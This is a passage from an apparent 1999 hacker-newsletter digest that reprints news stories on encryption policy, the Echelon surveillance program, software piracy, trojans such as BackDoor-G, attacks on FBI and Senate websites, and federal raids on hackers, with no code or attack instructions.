The controversy on encryption is about whether or not and to which extent cryptography should be restricted by law. This point has been discussed recently in many democratic industrial countries in a controversial way. An intensive argument took place in Germany too, with several ministries, industry, and numerous social groups participating.

In October 1997 the federal cabinet passed the ”Federal report: Info 2000: Germany's way into the information age”, containing a passage on cryptography:

”The Federal Government agrees on waiving to regulate by law the trade and use of cryptographic products and methods. Thus the unrestricted freedom of users with choosing and use of encryption systems remains not affected.
The Federal Government will watch further development in the field of cryptography thoroughly particularly within a European and international context. Further measures to reach its goals will be taken if necessary. ”

So far the Federal Government has not taken stand definitely and unequivocally.

Cryptography and economic interests

Due to the dynamic development of digital business dealings the markets for encryption products note high growth rates. Besides the traditional protection of confidence by now encryption systems are mainly used e.g. for digital copyright protection, digital signatures, and digital cash. Beyond this cryptography is a cross-section-technology indispensable for architecture and development of complex e-commerce applications. Indirectly much bigger markets are concerned like e.g. telecommunication, online-banking, or tele-medicine.

It’s true that present-day security standards, few years ago affordable only to large-scale enterprises and administration, are now within means of medium-sized and small enterprises as well as private households. But still in Germany cryptography is not used in the required degree. The necessary security awareness is lacking frequently even though considerable losses can be caused by espionage, manipulation, or destruction of data.

German crypto manufacturers would have a good chance of keeping up with international competition, if appropriate conditions are ensured. In view of the strategic meaning of the cryptographic sector many important industrial states spare no effort in order to strengthen their economical and technical capacities.

Cryptography and security interests

Cryptographic methods are of outstanding importance for efficient technical crime protection. That applies to ensuring of authenticity and integrity in data traffic as well as protection of confidence.
On the other hand protection of confidence is in favor of perpetrators: With cryptographic applications becoming more user-friendly spreading into criminal circles has to be expected. This could cause serious problems for law enforcement. Lawful surveillance ordered by a court has to remain effective even if the target guards concerned information with a cryptographic system.

Up to now abuse of encryption constitutes no serious problem for law enforcement. However there can’t be derived a forecast from this. It is necessary to actively examine possible consequences with regard to the specific needs of law enforcement and national security to early identify any undesirable development and take effective action against them based on alternative strategies.

With the recent national discussion as well as the international development as foundations the Federal Government agrees on the following cornerstones of encryption policy:

1. The Federal Government is not intended to restrict the general availability of cryptographic products in Germany. It recognizes the crucial importance of secure encryption for data protection, development of electronic business dealings, and protection of corporate secrets. Therefore the Federal Government will actively support spreading of secure encryption in Germany. This is meant to particularly promote awareness on security issues among business, administration, and private people.

2. The Federal Government aims at strengthening users to trust in cryptographic security. It will take measures to establish a trust framework for secure cryptography, particularly by improving the ability to check cryptographic products on security and recommending of qualified products.

3. The Federal Government considers the capability of German manufacturers to develop and manufacture secure and powerful cryptographic products as crucial to security of nation, business, and society.
It will take actions to improve the international competitiveness in this field.

4. The legal authority of law enforcement and security agencies to keep telecommunication under surveillance shall not be eroded by dissemination of strong methods for encryption. Therefore the competent ministries will be watching further development thoroughly and report after 2 years. Irrespective of that the Federal Government will support improving technical competence of law enforcement within the bounds of its possibilities.

5. The Federal Government sets a great store by international cooperation in the field of encryption. It stands up for market-developed open standards as well as interoperable systems and will speak up for strengthening of multi- and bilateral cooperation.

@HWA

36.0 US Congress Demands Echelon Docs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

An amendment to the fiscal 2000 Intelligence Authorization Act proposed last month by Sen. Bob Barr (R-Ga.) will force the director of Central Intelligence, the director of NSA and the attorney general to submit a report to Congress that outlines the legal standards being employed to safeguard the privacy of American citizens against Project Echelon.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0531/web-nsa-6-3-99.html

JUNE 3, 1999 . . . 18:34 EDT

Congress, NSA butt heads over Echelon

BY DANIEL VERTON (dan_verton@fcw.com)

Congress has squared off with the National Security Agency over a top-secret U.S. global electronic surveillance program, requesting top intelligence officials to report on the legal standards used to prevent privacy abuses against U.S. citizens.

According to an amendment to the fiscal 2000 Intelligence Authorization Act proposed last month by Rep.
Bob Barr (R-Ga.), the director of Central Intelligence, the director of NSA and the attorney general must submit a report within 60 days of the bill becoming law that outlines the legal standards being employed to safeguard the privacy of American citizens against Project Echelon.

Echelon is NSA's Cold War-vintage global spying system, which consists of a worldwide network of clandestine listening posts capable of intercepting electronic communications such as e-mail, telephone conversations, faxes, satellite transmissions, microwave links and fiber-optic communications traffic. However, the European Union last year raised concerns that the system may be regularly violating the privacy of law-abiding citizens [FCW, Nov. 17, 1998].

However, NSA, the supersecret spy agency known best for its worldwide eavesdropping capabilities, for the first time in the history of the House Permanent Select Committee on Intelligence refused to hand over documents on the Echelon program, claiming attorney/client privilege.

Congress is "concerned about the privacy rights of American citizens and whether or not there are constitutional safeguards being circumvented by the manner in which the intelligence agencies are intercepting and/or receiving international communications...from foreign nations that would otherwise be prohibited by...the limitations on the collection of domestic intelligence," Barr said. "This very straightforward amendment...will help guarantee the privacy rights of American citizens [and] will protect the oversight responsibilities of the Congress which are now under assault" by the intelligence community.

Calling NSA's argument of attorney/client privilege "unpersuasive and dubious," committee chairman Rep. Peter J. Goss (R-Fla.)
said the ability of the intelligence community to deny access to documents on intelligence programs could "seriously hobble the legislative oversight process" provided for by the Constitution and would "result in the envelopment of the executive branch in a cloak of secrecy."

@HWA

37.0 Windows2000 Already Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by 0Day

Officials in Singapore have confiscated over 700 pirated copies of Microsoft Windows2000 from area merchants. Raids last Monday turned up the software at two different retailers in residential areas of Katong and Kallang, Singapore. Windows2000 has not yet been officially released.

The Straits Times
http://web3.asia1.com.sg/archive/st/4/cyb/cyb1_0603.html

JUN 3 1999

Pirated Office 2000 being sold

PIRATED copies of Microsoft Office 2000 are already being sold here though the official launch of the new software takes place only next Monday.

Two raids last Monday turned up the pirated copies. They were found at two retail outlets in residential areas at Katong and Kallang.

Microsoft Singapore said in a statement on Tuesday that its representatives and the Intellectual Property Rights Warrant Unit seized about 700 CD-ROMs containing pirated software.

Microsoft's regional anti-piracy spokesman Rebecca Ho said: "This is an illustration of the pervasiveness of the problem and the speed with which pirates operate."

Microsoft warns that counterfeit software can contain viruses that could cause problems to a computer's software and hardware, and cost hundreds or thousands of dollars to fix.

@HWA

38.0 NetBus Takes #1 Spot
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by judd

After being given a 5 cow review from TUCOWS, Netbus Pro, the remote administration software recently turned shareware, has reached the #1 spot at DaveCentral after only five days.
Dave Central
http://www.davecentral.com/hot.html

NetBus
http://www.netbus.org

@HWA

39.0 [ISN] Police will have 24-hour access to secret files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.the-times.co.uk/news/pages/tim/99/05/27/timnwsnws01019.html?999

May 27 1999
BRITAIN

Police will have 24-hour access to secret files

Stewart Tendler

E-mail code-busters to join crime fight

A 24-HOUR technical centre to help to crack secret Internet and e-mail systems used by criminals is being set up by the computer industry and the police.

The centre will open encrypted messages for officers who have a warrant. If the codes cannot be cracked it will call in computer specialists.

Ministers are also introducing laws giving police and Customs investigators powers to order Internet operators to unlock encrypted systems for taps. Users could also be forced to hand over codes protecting information.

The plans were announced yesterday as ministers released a report by the Cabinet Office's Performance and Innovation Unit on the problems of encryption and police investigations.

The report revealed that telephone taps last year led to the seizure of three tonnes of heroin and cocaine and the arrest of 1,200 criminals.

Underlining that interceptions have become an "essential tool" the report said that one suspect involved in serious crime was arrested for every two warrants issued by Jack Straw, the Home Secretary. Interceptions became vital when intelligence could not be obtained by surveillance or informants.

In 1996-97 the taps resulted in the seizure of 450 guns and 112 tonnes of drugs, such as cannabis, worth £600 million.

Looking at ways of dealing with the rise of encryption programmes for e-mail and telephone systems, the report found that although there was general public acceptance of current telephone taps there was strong aversion in some areas to secret police access to the Internet.
The Government has already ruled out creating an authority which would hold the "keys" to encrypted systems sold by licensed firms and allow access to investigators. The report concluded that such a plan would be unwieldy and still would not give police enough access.

Yesterday Mr Straw said the plans showed that government and industry could work together. The aim was to develop the use of the Internet for commerce without encouraging or helping crime.

Case histories released yesterday show how terrorists and paedophiles are already using encryption and slowing or halting investigations.

In 1995 two men were arrested in the Home Counties and accused of being at the centre of a ring putting out child pornography. Detectives believed that encrypted material had been sent worldwide. The men were later jailed but 10 per cent of the material was never uncovered.

Last year police investigating sex and attempted murder allegations found encrypted material on a suspect's computer. They finally cracked the code when they discovered the decryption key among other material.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

40.0 [ISN] Hack attack knocks out FBI site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FBI cracks down on hacker group -- then fbi.gov is knocked offline by hack attack.

By Bob Sullivan and Brock Meeks, MSNBC
May 26, 1999 6:44 PM PT

A skirmish between the FBI and a well-known hacker group seemingly erupted Wednesday.

Not long after federal agents served search warrants on members of hacker group Global Hell (gH), probably in connection with recent attacks on U.S. government computers, the FBI's own Web site was attacked and is currently offline.

Earlier on Wednesday, MSNBC was told by a member of gH that the FBI had served search warrants on several members of the hacker group.
Last week, gH member Eric Burns (who also goes by the name Zyklon), was arrested in connection with three separate attacks on U.S. government computers, including systems at the U.S. Information Agency.

A hacker identifying himself as "Most Hated," the founder of gH, told MSNBC he was raided by agents at about 6 a.m. Wednesday morning in what he described as "a huge hacker crackdown." He said he knows of nine people who were raided by government officials -- including four in Houston, three in California and one in Seattle. None was arrested, but all had computer equipment confiscated, he said.

Late Wednesday, www.fbi.gov stopped working.

Credit claimed for hack

According to the Web site www.antionline.com, an individual calling himself Israeli Ghost was taking credit for the attack on the FBI's site. The FBI was not immediately available to comment.

"FBI WILL NOT {expletive deleted} WITH MY FRIENDS FROM GLOBAL HELL," the hacker allegedly wrote in an e-mail to Antionline.

Other members of the hacking community, contacted by MSNBC, said the FBI site was hit by what's called a denial of service attack. In such an attack, the host computer is not actually controlled by an outsider; rather, outsiders bombard a Web site with so many simultaneous hits that it becomes overwhelmed and can no longer function.

Most Hated said he didn't know who was responsible for the DOS attack. He said the FBI agents who raided him said the raid was in connection with "illegal telecom activity," which he believes is related to fraudulent teleconferences he set up.

White House hack connection

"The FBI told me that they were looking into illegal telecom activity," Most Hated told MSNBC. "The FBI said some company lost $250,000."

@HWA

41.0 [ISN] What's a Little Hacking Between Friends?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.zdnet.com/zdtv/siliconspin/features/story/0,3725,2245017,00.html

What's a Little Hacking Between Friends?

Spin debates hacking: Enjoyable hobby or criminal activity?

How much does hacking hurt? The companies hacked by Kevin Mitnick say the intrusions cost them millions of dollars in lost business and damages-- and they're handing him a collective restitution bill of $300 million.

Mitnick's lawyer, Don Randolph, says it's moot. Mitnick has spent years in jail, and when he gets out will be forbidden to touch a computer. Even discounting his legal bills, Mitnick is broke.

Trying to decide how harmful hacking really is sent the Spin panel into a tizzy. ZDTV's managing editor, Shauna Sampson, aligned with Forbes' Dennis Kneale to play down the dark side of hacking, while Suzanne Anderson from GlobalNet Ventures looked at the cost to businesses. Finally, Spencer Ante of thestreet.com discussed how these financials can affect the market.

[snip...]

@HWA

42.0 [ISN] New hacker attack uses screensavers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.news.com/News/Item/0,4,37180,00.html?st.ne.fd.tohhed.ni

New hacker attack uses screensavers

By Erich Luening
Staff Writer, CNET News.com
May 28, 1999, 8:20 a.m. PT

A new Trojan horse program sent by a hacker over the Internet via an email spam format as a screensaver could allow PCs to be accessed by unauthorized users.

BackDoor-G Trojan horse is considered a potentially dangerous new Trojan horse program that could allow hackers to remotely access and control infected PCs over the Internet, according to network security and management software maker Network Associates.

BackDoor-G affects Windows-based PCs.
When executed, BackDoor-G turns a user's system into a client system for a hacker, giving virtually unlimited remote access to the system over the Internet. The Trojan also is virtually undetectable by the user, although it has been reported as spreading as a screensaver and an update to a computer game.

The program is the latest in a string of new hybrid security threats that blur the line between viruses, security exploits, and malicious code attacks, the company said.

BackDoor-G is difficult to detect because it is able to change its filename and therefore hide from some traditional virus eradication methods such as simply deleting suspicious files.

Though BackDoor-G is not technically a virus, Network Associates advises PC users to request an update for both their antivirus and intrusion-detection software from their system administrators.

Sal Viveros, group marketing manager for Total Virus Defense at Network Associates, said the company has received a few dozen samples of the attack since midmorning yesterday.

"There is no one file name it uses," he said. "It spreads everywhere in the system.

"There is a trend here. We're seeing more and more programs that are stealing information or creating holes to get access to systems remotely," Viveros added.

@HWA

43.0 [ISN] Hackers beware: IBM to sharpen Haxor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: root

http://www.zdnet.com/pcweek/stories/news/0,4153,2267089,00.html

Hackers beware: IBM to sharpen Haxor

By Jim Kerstetter, PC Week Online
May 27 1999 4:49 PM ET

Hackers beware: Haxor is watching you from its perch in IBM's wide-ranging security suite.

This fall, Haxor is due for a face lift, along with IBM's Boundary Server firewall. They are two components of IBM's FirstSecure suite of applications, which includes everything from intrusion detection software to anti-virus software in the company's wider SecureWay security strategy.

Haxor will gain several new features, including better scanning for stealth attacks, such as low-bandwidth hacks and coordinated attacks from different geographic points, and improved ability to detect mangled and overlapping packets, company officials said.

IBM (NYSE:IBM) is also trying to improve Haxor's ability to filter out the white noise of regular network traffic, tuning it down enough so it can catch stealth attacks while not setting off frequent false alarms.

Haxor was developed at IBM's Global Security Analysis Lab, in Hawthorne, N.Y., said Dave Safford, manager at the lab.

There are two kinds of intrusion detection applications: One is based on servers or hosts and looks for attacks on that individual system; the other is network-based and sniffs packets as they come into the network, trying to determine if an attack is taking place. Haxor is network-based and can be found within IBM's FirstSecure suite as well as Tivoli Systems Inc.'s CrossSite network management suite.

"There is an incredible amount of data that comes out of these things," Safford said. "It can be a real problem."

To solve the problem, Safford said, IBM has developed "dynamic sensitivity," which will be able to correlate the difference between the attacks and legitimate traffic.

Network administrators are particularly interested in integration with management tools from companies such as Tivoli.

"That makes the most sense to me.
I want to be able to manage this from one point," said Doug Mallow, network administrator at a West Coast bank.

Also this fall, the Boundary Server firewall will be more tightly integrated with the SecureSite Policy Director, said IBM officials. Using the Common Content Inspection specification that is now under development, Boundary Server should be able to improve on performance, essentially sharing packets of data with other content inspection applications such as Content Technology Inc.'s MIMESweeper for e-mail inspection and Finjan Software Ltd.'s SurfinGate mobile code-scanning software.

IBM in January unveiled its SecureWay strategy for Internet and network security. Like competing packages from Hewlett-Packard Co., SecureWay is made up of both home-grown and OEM applications. IBM also has developed a Security Policy Director to tie together its security pieces.

IBM can be reached at (914) 499-1900 or www.ibm.com.

@HWA

44.0 [ISN] Feds Fend Off HACK3RZ
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: Simon Taplin

Feds Fend Off HACK3RZ

You might want to resend any e-mails you fired off to the FBI or the U.S. Senate yesterday. Hackers shut down both Web sites in a two-for-one attack that online media outlets dug right into. News.com reported that the attackers' intent was to crash the FBI site, not intrude into its files. Are the perps international spies? Perhaps double agents? International anarchists? Most likely they're adolescents not old enough to drive, Alan Paller, director of research for the SANS (System Administration, Networking and Security) Institute told News.com's Paul Festa. ZDNet scored with colorful details that indicate Paller might be right. It ran with the story and reported that the Senate Web site, too, had been downed Thursday evening. But the level of threat appears more comic book than spy thriller, according to ZDNN reporter Joel Deane. Fbi.gov had been hacked by a group called Global Hell, and the nefarious culprits behind the Senate attack call themselves MAST3RZ 0F D0WNL0ADING, or M0D to their friends. Turns out M0D taunted the feds with the message they left plastered on senate.gov: "FBI vs. M0D in '99, BR1NG IT 0N!" ZDNet got into the story, going so far as to mirror the M0D hack and engage the assistance of CyberCrime's Luke Reiter.

Hackers Deface Senate, Challenge FBI
http://www.zdnet.com/zdnn/stories/news/0,4586,2267421,00.html?chkpt=hpqs014

No Security Lapse in FBI Hack Attack
http://www.news.com/News/Item/0,4,37138,00.html

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

45.0 [ISN] High-tech snooping tools developed for spy agency
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Putrefied Cow
Originally
From: Anonymous Originally To: cypherpunks@toad.com High-tech snooping tools developed for spy agency The Vancouver Sun (May 24, 1999) Jim Bronskill Southam Newspapers OTTAWA -- Canada's electronic spy agency is quietly bankrolling the development of cutting-edge systems that can identify voices, analyze printed documents and zero in on conversations about specific topics. Documents show the Communications Security Establishment has enlisted the help of several leading Canadian research institutes to devise state-of-the-art snooping tools. CSE, an agency of the defence department, collects and processes telephone, fax and computer communications of foreign states, corporations and individuals. The federal government uses the intelligence gleaned from the data to support troops abroad, catch terrorists and further Canada's economic goals. CSE and counterpart agencies in the United States, Britain, Australia and New Zealand share intercepted communications of interest with one another, effectively creating a global surveillance web, according to intelligence experts. CSE's interest in high-tech devices that help locate specific conversations and documents is a clear indication the five-member alliance collects and sifts large volumes of civilian traffic, said Bill Robinson, a researcher in Waterloo, Ont., who has long studied the spy agencies. "This technology is needed to process vast communications streams when you're hunting for nuggets within it." Robinson said the devices have legitimate uses, but hold "potentially frightening" implications for people's privacy as the technology advances. The Centre for Pattern Recognition and Machine Intelligence, located at Concordia University in Montreal, received $355,000 to develop two systems for CSE that automatically analyze printed documents, such as faxes, once they are digitally captured in a computer data bank. 
The first system, completed early last year, quickly determines the language of a document, said the centre's C. Y. Suen. "Some humans may have problems in distinguishing Spanish from Portuguese, for example, or Spanish from Italian," he said. "So what we have developed is a system that can do it automatically." The second device electronically searches captured documents for distinct features, including logos, photos, text or signatures. Combining the two systems enables a user, for example, to search a data bank for Japanese documents containing photos, or Russian faxes with signatures. Records obtained by Southam News under the Access to Information Act show CSE commissioned several other projects during the last two years. They include: - An $84,981 contract with the University of Waterloo in Ontario for the "development of multilingual computer speech recognition systems." - A $115,000 agreement with the University of Quebec at Chicoutimi to research "speaker identification" procedures. - Work by the Centre de Recherche Informatique de Montreal on "topic spotting" -- a means of identifying the subject of a conversation. The $150,393 contract was the most recent of several awarded to CRIM. CSE spokesman Kevin Mills did not provide information on specific goals of the projects, but allowed: "In general, any research that we're funding has some kind of interest for CSE." The agency has been working on voice and phrase-detection systems for at least a decade. The documents, however, show the research continues, with some devices yet to be perfected. CSE and its four international partner agencies use computers capable of recognizing intercepted messages containing specified names, addresses, telephone numbers and other key words or numbers, says a new report on surveillance technology, by Scottish researcher Duncan Campbell. However, Campbell found the agencies lack systems for homing in on conversations featuring particular words. 
CSE would have trouble picking out a phone call with the words "assassination" or "revolution" because the speech recognition systems developed to date cannot instantly recognize an unknown person's voice traits. "The key problem, which is familiar to human listeners, is that a single word heard on its own can easily be misinterpreted, whereas in continuous speech the meaning may be deduced from surrounding words," says Campbell's report. -=-=-=-=- Spy agency developing powerful snoop tools May 24, 1999 By JIM BRONSKILL Southam Newspapers OTTAWA - Canada's electronic spy agency is quietly bankrolling the development of cutting-edge systems that can identify voices, analyze printed documents and zero in on conversations about specific topics. Documents show the Communications Security Establishment has enlisted the help of several leading Canadian research institutes to devise state-of-the-art snooping tools. CSE, an agency of the Defence Department, collects and processes telephone, fax and computer communications of foreign states, corporations and individuals. The federal government uses the intelligence gleaned from the data to support troops abroad, catch terrorists and further Canada's economic goals. CSE and counterpart agencies in the United States, Britain, Australia and New Zealand share intercepted communications of interest with one another, effectively creating a global surveillance web, according to intelligence experts. CSE's interest in high-tech devices that help locate specific conversations and documents is a clear indication the five-member alliance collects and sifts large volumes of civilian traffic, said Bill Robinson, a researcher in Waterloo, Ont., who has long studied the spy agencies. "This technology is needed to process vast communications streams when you're hunting for nuggets within it." Robinson said the devices have legitimate uses, but hold "potentially frightening" implications for people's privacy as the technology advances. 
"They'll be able to do things they never could've done in the past." The Centre for Pattern Recognition and Machine Intelligence, located at Concordia University in Montreal, received $355,000 to develop two systems for CSE that automatically analyze printed documents, such as faxes, once they are digitally captured in a computer data bank. The first system, completed early last year, quickly determines the language of a document, said the centre's C. Y. Suen. "Some humans may have problems in distinguishing Spanish from Portuguese, for example, or Spanish from Italian," he said. "So what we have developed is a system that can do it automatically." The second device electronically searches captured documents for distinct features, including logos, photos, text or signatures. Combining the two systems enables a user, for example, to search a data bank for Japanese documents containing photos, or Russian faxes with signatures. Records obtained by Southam News under the Access to Information Act show CSE commissioned several other projects during the last two years. They include: (*) An $84,981 contract with the University of Waterloo in Ontario for the "development of multilingual computer speech recognition systems." (*) A $115,000 agreement with the University of Quebec at Chicoutimi to research "speaker identification" procedures. (*) Work by the Centre de Recherche Informatique de Montreal on "topic spotting" - a means of identifying the subject of a conversation. The $150,393 contract was the most recent of several awarded to CRIM. CSE spokesman Kevin Mills did not provide information on specific goals of the projects, but allowed: "In general, any research that we're funding has some kind of interest for CSE." The agency has been working on voice- and phrase-detection systems for at least a decade. The documents, however, show the research continues, with some devices yet to be perfected. 
CSE and its four international partner agencies use computers capable of recognizing intercepted messages containing specified names, addresses, telephone numbers and other key words or numbers, says a new report on surveillance technology, by Scottish researcher Duncan Campbell. However, Campbell found the agencies lack systems for homing in on conversations featuring particular words. For example, CSE would have trouble picking out a phone call with the words "assassination" or "revolution" because the speech recognition systems developed to date cannot instantly recognize an unknown person's individual voice traits. "The key problem, which is familiar to human listeners, is that a single word heard on its own can easily be misinterpreted, whereas in continuous speech the meaning may be deduced from surrounding words," says Campbell's report. Montreal's CRIM is trying to get around the problem by devising the "topic spotting" system, says the report. In addition, intelligence agencies are using systems that recognize the "voiceprint" or speech pattern of targeted individuals, though the technology is not yet fully reliable.

[end]

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

46.0 [ISN] Privacy issues have taken center stage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: William Knowles http://www.wired.com/news/print_version/business/story/19973.html?wnpg=all (Wired News) TOKYO [6.2.99] -- Privacy issues have taken center stage as Japan prepares to enact legislation allowing the police to eavesdrop on phone calls, intercept fax and computer transmissions, and read email. The draconian measures are ostensibly intended to help law enforcement halt premeditated murders, trafficking in drugs and guns, and smuggling of illegal aliens into Japan. At least that's what a bill cobbled together by the country's coalition government says. The reality could be far more intrusive, especially after investigators receive an official green light to comb through private correspondence and communications. Japanese citizens' groups -- a hodgepodge of activists with little actual influence over policy decisions -- have decried the wiretapping legislation as a gross invasion of privacy, and opposition politicians boycotted a vote on the legislation last Friday. But the government insists that what Japan needs to restore public order is less civil liberty and more Big Brother. People here are scared. Crime -- once unthinkable in Japan -- is on the rise. The country's yakuza racketeers are growing increasingly bolder in their schemes as nearly a full decade of recession eats away at traditional revenue sources, such as payoffs from companies and corrupt politicians. For law-enforcement authorities, the trouble began back in 1995 when Aum Shinrikyo cultists released sarin gas in the Tokyo subway, killing a dozen people. The cops simply never saw the attack coming, and have been agitating for greater surveillance powers as a means of preventing such nastiness from happening again. Wiretapping is a convenient shortcut for investigators. And, as the pervasive eavesdropping of former East Bloc countries made undeniably clear, once authorities start listening it's a hard habit to break. 
Yozo Marutake, a former senior executive with a manufacturer of hearing aids called Rion, said last week that the Japanese police have been bugging phones for decades. How does he know this? Because his company sold the cops all their surveillance gear, and had done so since first being approached by authorities in 1957, he said. So why would the Japanese police now be seeking legal backing for their electronic skulking? One reason might have to do with charges from an opposition politician last year that his phone had been bugged. The courts upheld the politician's claims, although the cops never actually admitted being behind the incident. The Internet undoubtedly will be a low priority at first for Japan's snoops, but this will change as more people, criminals included, go online. For now, it looks like the cops are still unsure how to proceed where matters of cyberspace are concerned. Police last week raided the Sapporo home of an 18-year-old who had posted a bunch of hit tunes on his home page using the MP3 compression format. The teen, needless to say, hadn't worked out copyright issues in advance with related Japanese recording companies. Police didn't reveal how they learned about the song-laden site. But they said they moved quickly to shut things down after concluding that illegal actions were being perpetrated. This only took them three months of monitoring downloads to figure out.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

47.0 [ISN] Whitehouse to punish Hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: William Knowles http://www.news.com/News/Item/0,4,37257,00.html (News.com) [6.1.99] WASHINGTON--Annoyed by a recent wave of attacks against official U.S. government Web sites, the White House today warned hackers who target federal Web sites that they will be caught and punished. "There's a government-wide effort to make sure that our computer systems remain secure," White House Press Secretary Joe Lockhart said in a briefing. "For those who think that this is some sort of sport, I think [it will be] less fun when the authorities do catch up with them...and these people are prosecuted," he said. To protect against attacks that in recent days and weeks have disabled sites run by the Energy Department, the FBI, the Senate, the Interior Department, and the White House, the Defense Department said it planned to shut down its Web site for a short time today, said Ken Bacon, the Pentagon's chief spokesman. "This is much more protective than reactive," Bacon said. "It's looking to the future to prevent the types of problems that the other agencies" have experienced in recent weeks on their sites, he said. Attacking U.S. government Web sites is becoming an increasingly popular tool of people angry with the Clinton administration and its agencies. Last week hackers responded to a six-state FBI sweep of about 20 suspected hackers by attacking several government Internet locations, forcing the FBI, the Interior Department, and the U.S. Senate to temporarily shut down their Web sites. After NATO jets hit the Chinese Embassy in Belgrade in May, hackers from China attacked a handful of U.S. government sites, including one maintained by the Energy Department. In an unrelated incident, the official White House site was shut down briefly because of an attempt to tamper with it by unidentified hackers, officials said. 
In recent years the Justice Department's site was shut down once by hackers who put Nazi swastikas on its home page, and hackers forced the CIA to shut down its site after they changed the name from "Central Intelligence Agency" to "Central Stupidity Agency." With many U.S. government sites under attack, computer security experts are bracing for what could be a month full of additional Internet hacking incidents. Supporters of Kevin Mitnick, a hacker jailed in Los Angeles since February 1995, will demonstrate in 14 U.S. cities Friday, seeking his release to a halfway house and an easy probation when he is sentenced on June 14. Mitnick, 35, pleaded guilty on March 26 to seven counts of wire fraud, computer fraud, and illegal interception of a wire communication. Federal officials said he impersonated an employee of Finland-based Nokia Mobile Phones to steal software worth $240,000. He also stole software from Motorola, Novell, Fujitsu Network Transmission Systems, and Sun Microsystems, federal officials said. Supporters of Mitnick say the four years Mitnick has spent in jail awaiting trial is a harsher term than for many people convicted of violent crimes like robbery and assault. Their protest Friday will be seeking a more lenient sentence. The U.S. attorney for the Central District of California said Mitnick will be sentenced to 46 months in prison on June 14 as part of his plea bargain agreement with the government. Mitnick, whose exploits as a hacker inspired an upcoming Hollywood movie, also will be obliged to pay the victims of his crimes from any profits he makes from books or movies about his life, a spokesman for the U.S. attorney's office said. While hacking incidents may not be part of Friday's nationwide protest, there may be a surge in attacks across the Internet if Mitnick's sentence is perceived as too stiff, said John Vranesevich, the founder and director of AntiOnline. "Hackers attack when they're mad about something. 
The demonstration Friday will be an attempt to educate," said Vranesevich. "However, if Kevin Mitnick is put in jail, there very well could be more attacks after that." Still, other experts said Internet sites should upgrade their security against possible attack before Friday. "Given the timing, it probably would be a good idea to be more on guard than usual," said Jevon Jaconi, the district attorney of Kewaunee County, Wisconsin, and an expert in the developing field of cyberspace law. Between 70 percent and 80 percent of all Internet hacking attacks come on systems that have not updated their security codes, routinely sent by computer manufacturers and network administrators, Jaconi said. The best way to prevent hacking attacks in the future is to heed those security warnings and implement the needed changes, he said.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

48.0 [ISN] Federal Cybercrime unit hunts for hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[Moderator: This article will be going on the Errata site soon. This contains a wide variety of errors regarding the role and actions of John Vranesevich and AntiOnline. Mr. Richtel chose to believe JV at face value, and apparently did not challenge anything he said.]

http://www.nytimes.com/library/tech/99/mo/biztech/articles/02hack.html

June 2, 1999

Federal Cybercrime Unit Hunts for Hackers
By MATT RICHTEL

Raids by agents of the Federal Bureau of Investigation last week against several suspected computer hackers are part of a new Government cybercrime unit's crackdown against illegal tampering with computer networks and Web sites, a Federal prosecutor said Tuesday. The raids prompted a counteroffensive in which disparate hacker groups took responsibility for bringing down additional corporate and Government sites, including the F.B.I.'s public information site.
The events escalated a longstanding game of tit-for-tat between pranksters using personal computers and a newly galvanized Federal police force stung by recent attacks on some of the Government's high-level Web sites. Paul E. Coggins, the United States Attorney in Dallas who is overseeing the effort, said yesterday that Federal prosecutors had issued 16 warrants in 12 jurisdictions after a yearlong investigation, but had not yet charged anyone with a crime. The investigation is part of the Government's new, Dallas-based cybercrime task force, which includes the F.B.I., the Secret Service, the United States Attorney's Office and the Defense Department, Coggins said. "It's probably the most far-reaching investigation of its kind," he said. "It's an investigation with national and international implications." Coggins declined to elaborate or to say whether the targets of the investigation were considered to be part of a conspiracy. Don K. Clark, a special F.B.I. agent in Houston, said the activities under investigation included stealing and misusing credit card numbers and computer passwords. Two of those who were raided by the bureau's agents last Wednesday said one connection between some of the targets was that they knew one another from various discussion groups in an Internet chat forum called Internet Relay Chat. The participants said that the talk sometimes revolved around hacking techniques but that they were not involved in any general hacking conspiracy with other members of the discussion groups. "I have never defaced any Web pages or taken out any major sites," said Paul Maidman, 18, of Waldwick, N.J., one of those who were raided. Referring to proprietary computer systems, he said: "I got into other servers. I'd look around, read some E-mail, and that would be it." Maidman said he was awakened last Wednesday morning by five or six armed F.B.I. agents surrounding a living room couch where he slept. 
